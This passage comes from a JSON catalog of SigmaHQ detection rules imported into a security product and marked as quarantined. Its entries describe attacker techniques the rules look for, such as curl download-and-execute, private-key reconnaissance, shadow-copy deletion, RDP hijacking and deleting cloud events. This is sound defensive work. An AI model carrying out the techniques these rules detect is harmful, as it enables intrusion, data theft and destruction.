This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ses-identity-has-been-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "20f754db-d025-4a8f-9d74-e0037e999a9a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_delete_identity.yml" } }, { "id": "sigmahq-sigma-2111118f-7e46-4fc8-974a-59fd8ec95196", "type": "detection", "name": "DiagTrackEoP Default Login Username", "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/diagtrackeop-default-login-username.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml" } }, { "id": 
"sigmahq-sigma-213d6a77-3d55-4ce8-ba74-fcfef741974e", "type": "detection", "name": "Private Keys Reconnaissance Via CommandLine Tools", "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/private-keys-reconnaissance-via-commandline-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_private_keys_recon.yml" } }, { "id": "sigmahq-sigma-214641c2-c579-4ecb-8427-0cf19df6842e", "type": "detection", "name": "Remote File Download Via Desktopimgdownldr Utility", "description": "Detects the desktopimgdownldr utility being used to download a remote file. 
An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-file-download-via-desktopimgdownldr-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "214641c2-c579-4ecb-8427-0cf19df6842e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml" } }, { "id": "sigmahq-sigma-214e7e6c-f21b-47ff-bb6f-551b2d143fcf", "type": "detection", "name": "Clipboard Collection with Xclip Tool - Auditd", "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-collection-with-xclip-tool-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_clipboard_collection.yml" } }, { "id": "sigmahq-sigma-214e8f95-100a-4e04-bb31-ef6cba8ce07e", "type": "detection", "name": "DCERPC SMB Spoolss Named Pipe", "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dcerpc-smb-spoolss-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" } }, { "id": "sigmahq-sigma-21541900-27a9-4454-9c4c-3f0a4240344a", "type": "detection", "name": "OMIGOD SCX RunAsProvider ExecuteShellCommand", "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1190", "T1203" ], "log_source": null, "playbook": null, 
"verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/omigod-scx-runasprovider-executeshellcommand.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21541900-27a9-4454-9c4c-3f0a4240344a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" } }, { "id": "sigmahq-sigma-2158f96f-43c2-43cb-952a-ab4580f32382", "type": "detection", "name": "Screen Capture Activity Via Psr.EXE", "description": "Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-activity-via-psr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2158f96f-43c2-43cb-952a-ab4580f32382", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml" } }, { "id": "sigmahq-sigma-218d2855-2bba-4f61-9c85-81d0ea63ac71", "type": "detection", "name": "MSSQL Server Failed Logon", "description": "Detects failed logon attempts from clients to MSSQL server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-server-failed-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "218d2855-2bba-4f61-9c85-81d0ea63ac71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml" } }, { "id": "sigmahq-sigma-21d856f9-9281-4ded-9377-51a1a6e2a432", "type": "detection", "name": "Potential Persistence Via Logon Scripts - CommandLine", "description": "Detects the addition of a new LogonScript to the registry value \"UserInitMprLogonScript\" for potential persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1037.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-logon-scripts-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21d856f9-9281-4ded-9377-51a1a6e2a432", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_logon_script.yml" } }, { "id": "sigmahq-sigma-21dd6d38-2b18-4453-9404-a0fe4a0cc288", "type": "detection", "name": "Curl Download And Execute Combination", "description": 
"Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/curl-download-and-execute-combination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml" } }, { "id": "sigmahq-sigma-21e44d78-95e7-421b-a464-ffd8395659c4", "type": "detection", "name": "HTTP Request With Empty User Agent", "description": "Detects potentially suspicious empty user agent strings in proxy logs.\nCould potentially indicate an uncommon request method.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/http-request-with-empty-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21e44d78-95e7-421b-a464-ffd8395659c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/web/proxy_generic/proxy_ua_empty.yml" } }, { "id": "sigmahq-sigma-21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "type": "detection", "name": "Import PowerShell Modules From Suspicious Directories", "description": "Detects powershell scripts that import modules from suspicious directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/import-powershell-modules-from-suspicious-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" } }, { "id": "sigmahq-sigma-21ff4ca9-f13a-41ad-b828-0077b2af2e40", "type": "detection", "name": "Deletion of Volume Shadow Copies via WMI with PowerShell", "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deletion-of-volume-shadow-copies-via-wmi-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml" } }, { "id": "sigmahq-sigma-220457c1-1c9f-4c2e-afe6-9598926222c1", "type": "detection", "name": "Delete All Scheduled Tasks", "description": "Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delete-all-scheduled-tasks.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "220457c1-1c9f-4c2e-afe6-9598926222c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml" } }, { "id": "sigmahq-sigma-22154f0e-5132-4a54-aa78-cc62f6def531", "type": "detection", "name": "Vulnerable Driver Blocklist Registry Tampering Via CommandLine", "description": "Detects tampering of the Vulnerable Driver Blocklist registry via command line tools such as PowerShell or REG.EXE.\nThe Vulnerable Driver Blocklist is a security feature that helps prevent the loading of known vulnerable drivers.\nDisabling this feature may indicate an attempt to bypass security controls, often targeted by threat actors\nto facilitate the installation of malicious or vulnerable drivers, particularly in scenarios involving Endpoint Detection and Response", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-driver-blocklist-registry-tampering-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22154f0e-5132-4a54-aa78-cc62f6def531", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vulnerable_driver_blocklist_registry_tampering.yml" } }, { "id": "sigmahq-sigma-221b251a-357a-49a9-920a-271802777cc0", "type": "detection", "name": "Process Reconnaissance Via Wmic.EXE", "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "221b251a-357a-49a9-920a-271802777cc0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml" } }, { "id": "sigmahq-sigma-222129f7-f4dc-4568-b0d2-22440a9639ba", "type": "detection", "name": "Cloudflared Quick Tunnel Execution", "description": "Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.\nThe free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.\nThe tool has been observed in use by threat groups including Akira ransomware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1090.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cloudflared-quick-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "222129f7-f4dc-4568-b0d2-22440a9639ba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml" } }, { "id": "sigmahq-sigma-22236d75-d5a0-4287-bf06-c93b1770860f", "type": "detection", "name": "Triple Cross eBPF Rootkit Install Commands", "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1014" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-install-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22236d75-d5a0-4287-bf06-c93b1770860f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" } }, { "id": "sigmahq-sigma-222720a7-047f-4054-baa5-bab9be757db0", "type": "detection", "name": "PowerShell MSI Install via WindowsInstaller COM From Remote Location", "description": "Detects the execution of PowerShell commands that attempt to install MSI packages via the\nWindows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.\nThis could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.\nAnd the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1218", "T1105" ], "log_source": null, "playbook": null, "verified": false, 
"source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-msi-install-via-windowsinstaller-com-from-remote-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "222720a7-047f-4054-baa5-bab9be757db0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml" } }, { "id": "sigmahq-sigma-224f140f-3553-4cd1-af78-13d81bf9f7cc", "type": "detection", "name": "Potential RDP Session Hijacking Activity", "description": "Detects potential RDP Session Hijacking activity on Windows systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-rdp-session-hijacking-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml" } }, { "id": "sigmahq-sigma-225274c4-8dd1-40db-9e09-71dff4f6fb3c", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-4.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "225274c4-8dd1-40db-9e09-71dff4f6fb3c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_4.yml" } }, { "id": "sigmahq-sigma-225d8b09-e714-479c-a0e4-55e6f29adf35", "type": "detection", "name": "Azure Kubernetes Events Deleted", "description": "Detects when Events are deleted in Azure Kubernetes. 
An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-events-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "225d8b09-e714-479c-a0e4-55e6f29adf35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_events_deleted.yml" } }, { "id": "sigmahq-sigma-2267fe65-0681-42ad-9a6d-46553d3f3480", "type": "detection", "name": "WSL Child Process Anomaly", "description": "Detects uncommon or suspicious child processes spawning from a WSL process. 
This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wsl-child-process-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2267fe65-0681-42ad-9a6d-46553d3f3480", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml" } }, { "id": "sigmahq-sigma-22777c9e-873a-4b49-855f-6072ab861a52", "type": "detection", "name": "OpenCanary - SMB File Open Request", "description": "Detects instances where an SMB service on an OpenCanary node has had a file open request.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021", "T1005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-smb-file-open-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22777c9e-873a-4b49-855f-6072ab861a52", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_smb_file_open.yml" } }, { "id": 
"sigmahq-sigma-22c45af6-f590-4d44-bab3-b5b2d2a2b6d9", "type": "detection", "name": "Remote Access Tool - Potential MeshAgent Execution - MacOS", "description": "Detects potential execution of MeshAgent which is a tool used for remote access.\nHistorical data shows that threat actors rename MeshAgent binary to evade detection.\nMatching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-potential-meshagent-execution-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22c45af6-f590-4d44-bab3-b5b2d2a2b6d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_remote_access_tools_meshagent_arguments.yml" } }, { "id": "sigmahq-sigma-22d80745-6f2c-46da-826b-77adaededd74", "type": "detection", "name": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-dacl-modification-via-set-service-cmdlet-ps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22d80745-6f2c-46da-826b-77adaededd74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" } }, { "id": "sigmahq-sigma-22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "type": "detection", "name": "Base64 MZ Header In CommandLine", "description": "Detects encoded base64 MZ header in the commandline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/base64-mz-header-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml" } }, { "id": "sigmahq-sigma-22f2fb54-5312-435d-852f-7c74f81684ca", "type": "detection", "name": "Google 
Workspace Application Access Level Modified", "description": "Detects when an access level is changed for a Google workspace application.\nAn access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.\nAn adversary would be able to remove access levels to gain easier access to Google workspace resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-application-access-level-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "22f2fb54-5312-435d-852f-7c74f81684ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_application_access_levels_modified.yml" } }, { "id": "sigmahq-sigma-2316929c-01aa-438c-970f-099145ab1ee6", "type": "detection", "name": "JAMF MDM Potential Suspicious Child Process", "description": "Detects potential suspicious child processes of \"jamf\". 
